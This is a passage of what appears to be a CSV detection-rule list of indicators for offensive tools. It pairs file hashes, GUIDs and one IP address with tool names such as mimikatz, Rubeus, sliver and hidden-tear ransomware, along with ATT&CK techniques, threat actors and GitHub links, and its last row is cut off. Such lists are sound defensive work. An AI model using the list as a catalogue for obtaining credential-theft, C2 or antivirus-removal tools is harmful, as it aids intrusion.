"*65efc0f2db588996d96021ce4be127ac2b18800d9d35c8a1a5aa7d3140370330*",".{0,1000}65efc0f2db588996d96021ce4be127ac2b18800d9d35c8a1a5aa7d3140370330.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28091" "*65f5366b645bcc846eb270d514fd8f1c777a3a7b7534a6364e251268e9741346*",".{0,1000}65f5366b645bcc846eb270d514fd8f1c777a3a7b7534a6364e251268e9741346.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","28093" "*66012c3a70e772908a9e8571665562fad55a04447452b751719a80d20ebf83e7*",".{0,1000}66012c3a70e772908a9e8571665562fad55a04447452b751719a80d20ebf83e7.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","28095" 
"*660309440ef382c2966a9186161e0777d4e4fbd7b0acce8ef040e43609513282*",".{0,1000}660309440ef382c2966a9186161e0777d4e4fbd7b0acce8ef040e43609513282.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","28096" "*6634da3e8e2590317704a1ddcba7fcc177aa5f532d81717431d0a6668d9594c8*",".{0,1000}6634da3e8e2590317704a1ddcba7fcc177aa5f532d81717431d0a6668d9594c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28104" "*663792a8eca37f76270dae1ebc24d3c29bd028457478f2b505839f9303818648*",".{0,1000}663792a8eca37f76270dae1ebc24d3c29bd028457478f2b505839f9303818648.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28106" "*663a4660da761fa144f2b5a591f84a081d29f62d881d9d24d8f5e0e8e5341a84*",".{0,1000}663a4660da761fa144f2b5a591f84a081d29f62d881d9d24d8f5e0e8e5341a84.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28107" 
"*6641564c893c3cb1dff02607a922afdaaa48ba93b0bc35cc90094fb653ee3dba*",".{0,1000}6641564c893c3cb1dff02607a922afdaaa48ba93b0bc35cc90094fb653ee3dba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28108" "*6646a6c4e3006b90ff7009eb28cd9d5ff182d7f4d8465dbe63357a8c054257bb*",".{0,1000}6646a6c4e3006b90ff7009eb28cd9d5ff182d7f4d8465dbe63357a8c054257bb.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28109" "*664ed4839518dc4ca3c904778f4deee7ea0b0ba0baabd9d2de4c4b9d9b81b77a*",".{0,1000}664ed4839518dc4ca3c904778f4deee7ea0b0ba0baabd9d2de4c4b9d9b81b77a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28111" 
"*66504e8c044a01ed3ef2a97dd36de68b7b1913d737d6ad4e6bd7778d80dec92f*",".{0,1000}66504e8c044a01ed3ef2a97dd36de68b7b1913d737d6ad4e6bd7778d80dec92f.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#filehash","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","28112" "*66512a2c31adfe77fb66c2c824e55509ba2cce70d158e850f0e56e3dc664f420*",".{0,1000}66512a2c31adfe77fb66c2c824e55509ba2cce70d158e850f0e56e3dc664f420.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28113" "*665593018e2d7938198172532fad4e17c501253b1a75106904d0eb50bf2b8c75*",".{0,1000}665593018e2d7938198172532fad4e17c501253b1a75106904d0eb50bf2b8c75.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28115" "*665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a*",".{0,1000}665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","28116" 
"*665b1b72ff02156034706a2a4548ac10a338bb350d6f09218b9ce0f53c4d87a8*",".{0,1000}665b1b72ff02156034706a2a4548ac10a338bb350d6f09218b9ce0f53c4d87a8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28117" "*6678fb7c21974e7dbc5948f6c057f0bc4204e7bcd562c5477550f4bb844eba2f*",".{0,1000}6678fb7c21974e7dbc5948f6c057f0bc4204e7bcd562c5477550f4bb844eba2f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28121" "*668718b8b09f631c3f1fa81519b99b83792a2e84d306296997a28db2e4f90d8c*",".{0,1000}668718b8b09f631c3f1fa81519b99b83792a2e84d306296997a28db2e4f90d8c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28124" "*668a6e83e72ffc8aa7d36949aad3aefca4b676b996ec099bde25edb52a56f913*",".{0,1000}668a6e83e72ffc8aa7d36949aad3aefca4b676b996ec099bde25edb52a56f913.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28125" "*6690cb6d6fa47260c2cf4ac43b64d2d46e7a7ae4f8d0f10f4fce5d423a1dacad*",".{0,1000}6690cb6d6fa47260c2cf4ac43b64d2d46e7a7ae4f8d0f10f4fce5d423a1dacad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28126" "*66924A72494CDBBE223AE81A49AAA2A47DAD741CBC5D180FA85C66ACE641DC35*",".{0,1000}66924A72494CDBBE223AE81A49AAA2A47DAD741CBC5D180FA85C66ACE641DC35.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28128" "*66928c3316a12091995198710e0c537430dacefac1dbe78f12a331e1520142bd*",".{0,1000}66928c3316a12091995198710e0c537430dacefac1dbe78f12a331e1520142bd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28129" "*66928c3316a12091995198710e0c537430dacefac1dbe78f12a331e1520142bd*",".{0,1000}66928c3316a12091995198710e0c537430dacefac1dbe78f12a331e1520142bd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28130" "*6698d5497a277c219184b29528e85650b887b7222c36b55ed1d2cf8bda0f57c8*",".{0,1000}6698d5497a277c219184b29528e85650b887b7222c36b55ed1d2cf8bda0f57c8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash 
#linux","N/A","5","","N/A","","","","28131" "*66AA4619-4D0F-4226-9D96-298870E9BB50*",".{0,1000}66AA4619\-4D0F\-4226\-9D96\-298870E9BB50.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#GUIDproject","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28134" "*66AA4619-4D0F-4226-9D96-298870E9BB50*",".{0,1000}66AA4619\-4D0F\-4226\-9D96\-298870E9BB50.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#GUIDproject","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28135" "*66b63cd9f55f90b78592f0b6d9fd5ba8b8b31b538bd20be459f2a380811f4d13*",".{0,1000}66b63cd9f55f90b78592f0b6d9fd5ba8b8b31b538bd20be459f2a380811f4d13.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28138" 
"*66c00239681d0f5822544fa18f461864df248a0dc5a76c4a3f981dac5af89162*",".{0,1000}66c00239681d0f5822544fa18f461864df248a0dc5a76c4a3f981dac5af89162.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","28139" "*66c22a683d5db931524f36f878f343210a43c78b5f09aa2b78ba9511ea76f679*",".{0,1000}66c22a683d5db931524f36f878f343210a43c78b5f09aa2b78ba9511ea76f679.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28140" "*66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0*",".{0,1000}66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","28141" "*66cc6913830c3720ead982e9cd43574bb3340d112521e86b4cf3c9edf627f88b*",".{0,1000}66cc6913830c3720ead982e9cd43574bb3340d112521e86b4cf3c9edf627f88b.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28144" "*66cf5ea7e6e66a06e331c24e6210453c39788f86973a3078dce8324aaee11af8*",".{0,1000}66cf5ea7e6e66a06e331c24e6210453c39788f86973a3078dce8324aaee11af8.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28146" "*66d16546824f6e98b531bfdfe411ba4b837e99362f735ed2dd61ead2aae4ab91*",".{0,1000}66d16546824f6e98b531bfdfe411ba4b837e99362f735ed2dd61ead2aae4ab91.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","28147" "*66d21568244cc3fda07d6d6c28b0bc683f18f12d4508bbe7be070b9e98989395*",".{0,1000}66d21568244cc3fda07d6d6c28b0bc683f18f12d4508bbe7be070b9e98989395.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28148" "*66d6387cef13f58ab746d452dc68e0f3e71d509a50a4f7518490fbf0cc16e3d4*",".{0,1000}66d6387cef13f58ab746d452dc68e0f3e71d509a50a4f7518490fbf0cc16e3d4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28149" "*66e0681a500c726ed52e5ea9423d2654*",".{0,1000}66e0681a500c726ed52e5ea9423d2654.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","28150" "*66f1e5e9916366d406955233a55d5bcff573c46a06c2424de65bc71adf6629fc*",".{0,1000}66f1e5e9916366d406955233a55d5bcff573c46a06c2424de65bc71adf6629fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28153" "*67.171.34.23*",".{0,1000}67\.171\.34\.23.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","#ipaddress","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","28155" 
"*67086ee2d7fc1c67e2aa1f341b6c692b711fe890c419b9e3b7a80c727163db64*",".{0,1000}67086ee2d7fc1c67e2aa1f341b6c692b711fe890c419b9e3b7a80c727163db64.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28157" "*670b7828e25e5f8f015e74468836762e764a4e345d851ed656715eeae70cdbec*",".{0,1000}670b7828e25e5f8f015e74468836762e764a4e345d851ed656715eeae70cdbec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28158" "*6727e1988ae996df818696de98826a6dcf0e0fc3dd7e32cf9247b41fa225b856*",".{0,1000}6727e1988ae996df818696de98826a6dcf0e0fc3dd7e32cf9247b41fa225b856.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","28163" "*6743328a2adebc279e702b4fbfc978b8689dbe9313a157b3cbffafd3a77b610e*",".{0,1000}6743328a2adebc279e702b4fbfc978b8689dbe9313a157b3cbffafd3a77b610e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28168" 
"*6746881860057860fe384c046a89cdf6f5e3bbd014793b6e0d029f160b4119cf*",".{0,1000}6746881860057860fe384c046a89cdf6f5e3bbd014793b6e0d029f160b4119cf.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","28169" "*674ca493a5e0a62ec5190a54861a065b3b3a15e59fe74e4012590f97329490c0*",".{0,1000}674ca493a5e0a62ec5190a54861a065b3b3a15e59fe74e4012590f97329490c0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28170" "*6752dd08be06b124a3e1865645b5b1a6b4f8765ac8fc3fa002bd39ec448e4ba2*",".{0,1000}6752dd08be06b124a3e1865645b5b1a6b4f8765ac8fc3fa002bd39ec448e4ba2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28171" "*67544c3753cabf093153fc9fadf25640e8ab4fec6ce16ae37844b505c232fd72*",".{0,1000}67544c3753cabf093153fc9fadf25640e8ab4fec6ce16ae37844b505c232fd72.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28172" 
"*6754d8a678534bb60c6d140a76564a2288cc4b03e4c82cbe17d174546178d553*",".{0,1000}6754d8a678534bb60c6d140a76564a2288cc4b03e4c82cbe17d174546178d553.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28173" "*67552b46f859511333d63e26a980b251e458c474243aa2af4c2f697aaea3680f*",".{0,1000}67552b46f859511333d63e26a980b251e458c474243aa2af4c2f697aaea3680f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - 